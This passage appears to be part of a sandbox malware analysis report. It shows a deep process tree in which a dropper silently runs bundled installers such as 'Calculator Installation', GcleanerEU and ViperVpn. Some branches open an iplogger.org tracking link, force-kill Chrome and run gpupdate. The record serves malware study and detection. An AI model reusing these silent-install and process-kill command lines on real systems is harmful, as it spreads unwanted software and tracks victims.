                                                                                                                                      PID:5928
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-RPPJE.tmp\Adam.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-RPPJE.tmp\Adam.exe" /S /UID=2709
                                                                                                                                        10⤵
                                                                                                                                          PID:6576
                                                                                                                                          • C:\Program Files\Reference Assemblies\VBIAUDLDAG\foldershare.exe
                                                                                                                                            "C:\Program Files\Reference Assemblies\VBIAUDLDAG\foldershare.exe" /VERYSILENT
                                                                                                                                            11⤵
                                                                                                                                              PID:6608
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\87-a84b0-159-60b9c-0a725b2c99cb7\Pofolopaedi.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\87-a84b0-159-60b9c-0a725b2c99cb7\Pofolopaedi.exe"
                                                                                                                                              11⤵
                                                                                                                                                PID:1580
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                  12⤵
                                                                                                                                                    PID:1380
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9e99646f8,0x7ff9e9964708,0x7ff9e9964718
                                                                                                                                                      13⤵
                                                                                                                                                        PID:1716
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
                                                                                                                                                        13⤵
                                                                                                                                                          PID:7104
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
                                                                                                                                                          13⤵
                                                                                                                                                            PID:6196
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
                                                                                                                                                            13⤵
                                                                                                                                                              PID:1596
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                                                                                                                                              13⤵
                                                                                                                                                                PID:488
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
                                                                                                                                                                13⤵
                                                                                                                                                                  PID:5916
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:7792
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:8252
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
                                                                                                                                                                      13⤵
                                                                                                                                                                        PID:8284
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:11168
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
                                                                                                                                                                          13⤵
                                                                                                                                                                            PID:11248
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3004689882190381114,2034923975438797838,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:11640
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1d-44fa1-b48-24cb8-e6f4fb162a982\Waemopaniri.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\1d-44fa1-b48-24cb8-e6f4fb162a982\Waemopaniri.exe"
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:920
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\txswkjoc.mx3\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet & exit
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:14064
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\txswkjoc.mx3\Calculator%20Installation.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\txswkjoc.mx3\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:5640
                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Calculator\Calculator 1.0.0\install\FD7DF1F\Calculator Installation.msi" SID=764 CID=764 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\txswkjoc.mx3\Calculator%20Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\txswkjoc.mx3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633372098 SID=764 CID=764 SILENT=1 /quiet " SID="764" CID="764"
                                                                                                                                                                                      14⤵
                                                                                                                                                                                        PID:2876
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w4v3nnmp.4gn\Calculator%20Installation.exe & exit
                                                                                                                                                                                    12⤵
                                                                                                                                                                                      PID:16180
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\w4v3nnmp.4gn\Calculator%20Installation.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\w4v3nnmp.4gn\Calculator%20Installation.exe
                                                                                                                                                                                        13⤵
                                                                                                                                                                                          PID:7084
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                            14⤵
                                                                                                                                                                                              PID:8864
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--RBSvZ"
                                                                                                                                                                                                15⤵
                                                                                                                                                                                                  PID:13108
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff9e9aadec0,0x7ff9e9aaded0,0x7ff9e9aadee0
                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                      PID:13584
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6b77f9e70,0x7ff6b77f9e80,0x7ff6b77f9e90
                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                          PID:13620
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1600 /prefetch:2
                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                          PID:13800
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --mojo-platform-channel-handle=1944 /prefetch:8
                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                            PID:13816
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2428 /prefetch:1
                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                              PID:13940
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2536 /prefetch:1
                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                PID:13968
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --mojo-platform-channel-handle=2240 /prefetch:8
                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                  PID:13888
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3328 /prefetch:2
                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                    PID:15400
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --mojo-platform-channel-handle=3344 /prefetch:8
                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                      PID:15568
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,14517095141589239833,14925513159204655087,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw13108_2079361886" --mojo-platform-channel-handle=3400 /prefetch:8
                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                        PID:15804
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uktkhbyl.tng\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                  PID:16256
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\uktkhbyl.tng\GcleanerEU.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\uktkhbyl.tng\GcleanerEU.exe /eufive
                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:5508
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 300
                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                      PID:6444
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ncouusgj.xjq\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                    PID:16364
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ncouusgj.xjq\installer.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\ncouusgj.xjq\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5848
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ncouusgj.xjq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ncouusgj.xjq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633372098 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                          PID:8068
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p2ayg3qv.g3a\any.exe & exit
                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                        PID:5440
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\p2ayg3qv.g3a\any.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\p2ayg3qv.g3a\any.exe
                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                            PID:4964
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\10gciym3.dp5\NAN.exe & exit
                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                            PID:5556
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10gciym3.dp5\NAN.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\10gciym3.dp5\NAN.exe
                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                PID:1916
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10gciym3.dp5\NAN.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\10gciym3.dp5\NAN.exe
                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                    PID:5480
                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1hrBr7
                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                        PID:11556
                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e99646f8,0x7ff9e9964708,0x7ff9e9964718
                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                            PID:11584
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fayw31hb.p5e\customer9.exe & exit
                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                      PID:2924
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fayw31hb.p5e\customer9.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\fayw31hb.p5e\customer9.exe
                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                          PID:7140
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ktxgf0ar.sw3\ViperVpn.exe & exit
                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                          PID:4348
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ktxgf0ar.sw3\ViperVpn.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\ktxgf0ar.sw3\ViperVpn.exe
                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                              PID:7752
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-OA64C.tmp\ViperVpn.tmp
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-OA64C.tmp\ViperVpn.tmp" /SL5="$203C4,138429,56832,C:\Users\Admin\AppData\Local\Temp\ktxgf0ar.sw3\ViperVpn.exe"
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                  PID:7912
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-122EO.tmp\Setup.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-122EO.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                      PID:9188
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                          PID:9312
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                            PID:9816
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\gpupdate.exe" /force
                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                            PID:9304
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\auiio4mx.emp\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                      PID:5816
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\auiio4mx.emp\gcleaner.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\auiio4mx.emp\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                          PID:7896
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7896 -s 304
                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:8988
                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ylckyfcu.ett\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:7396
                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g4tnomkc.x5x\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                            PID:7860
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\g4tnomkc.x5x\installer.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\g4tnomkc.x5x\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                PID:8588
                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\NFf7cNciBAJhVUUqntgPPjMs.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\NFf7cNciBAJhVUUqntgPPjMs.exe" silent
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:9160
                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\a41UKoB6rMkA7Wr31HaVnoPd.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\a41UKoB6rMkA7Wr31HaVnoPd.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:5568
                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\S__npfqx6N5GczvFZe3z9Ey8.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\S__npfqx6N5GczvFZe3z9Ey8.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:5560
